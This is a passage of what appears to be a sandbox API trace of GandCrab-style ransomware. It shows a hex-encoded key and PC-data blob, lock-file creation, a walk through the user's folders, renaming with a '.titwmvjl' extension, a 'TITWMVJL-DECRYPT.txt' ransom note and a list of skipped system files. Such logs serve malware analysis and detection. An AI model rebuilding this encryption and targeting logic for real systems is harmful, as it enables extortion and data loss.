5\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.278] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0072.279] CloseHandle (hObject=0x2cc) returned 1 [0072.279] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.280] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.280] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x24e)) [0072.280] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.280] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.280] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.280] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\d2ca4a09d2ca4deb61a.lock") returned 103 [0072.281] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0072.281] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.281] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.282] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned 79 [0072.282] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0072.282] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x503278 [0072.282] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.282] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.283] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.283] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.283] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.283] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.283] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.283] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\d2ca4a09d2ca4deb61a.lock" [0072.283] lstrlenW (lpString=".titwmvjl") returned 9 [0072.283] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\d2ca4a09d2ca4deb61a.lock") returned 103 [0072.283] VirtualAlloc (lpAddress=0x0, dwSize=0x10e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.283] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 112 [0072.283] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\d2ca4a09d2ca4deb61a.lock") returned 103 [0072.283] lstrlenW (lpString=".lock") returned 5 [0072.283] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.284] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.284] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.291] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.291] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.291] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.291] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.291] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\TITWMVJL-DECRYPT.txt" [0072.291] lstrlenW (lpString=".titwmvjl") returned 9 [0072.291] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\TITWMVJL-DECRYPT.txt") returned 99 [0072.291] VirtualAlloc (lpAddress=0x0, dwSize=0x106, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.291] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 108 [0072.292] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\TITWMVJL-DECRYPT.txt") returned 99 [0072.292] lstrlenW (lpString=".txt") returned 4 [0072.292] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.292] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.292] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.292] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.292] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\TITWMVJL-DECRYPT.txt") returned 99 [0072.292] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\TITWMVJL-DECRYPT.txt") returned 99 [0072.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.292] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.292] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.292] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0072.292] FindClose (in: hFindFile=0x503278 | out: hFindFile=0x503278) returned 1 [0072.293] CloseHandle (hObject=0x2cc) returned 1 [0072.293] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.293] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.293] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.293] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\TITWMVJL-DECRYPT.txt" [0072.293] lstrlenW (lpString=".titwmvjl") returned 9 [0072.293] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\TITWMVJL-DECRYPT.txt") returned 95 [0072.293] VirtualAlloc (lpAddress=0x0, dwSize=0xfe, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.293] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 104 [0072.293] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\TITWMVJL-DECRYPT.txt") returned 95 [0072.293] lstrlenW (lpString=".txt") returned 4 [0072.293] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.294] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.294] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.294] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.294] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\TITWMVJL-DECRYPT.txt") returned 95 [0072.294] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\TITWMVJL-DECRYPT.txt") returned 95 [0072.294] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.294] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.294] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.294] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.294] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.294] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.294] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.294] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.294] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.294] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0072.294] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0072.295] CloseHandle (hObject=0x2c4) returned 1 [0072.295] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0072.295] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0072.296] CloseHandle (hObject=0x2bc) returned 1 [0072.296] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0072.296] lstrcmpW (lpString1="MMC", lpString2=".") returned 1 [0072.296] lstrcmpW (lpString1="MMC", lpString2="..") returned 1 [0072.296] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="MMC" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC" [0072.296] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\" 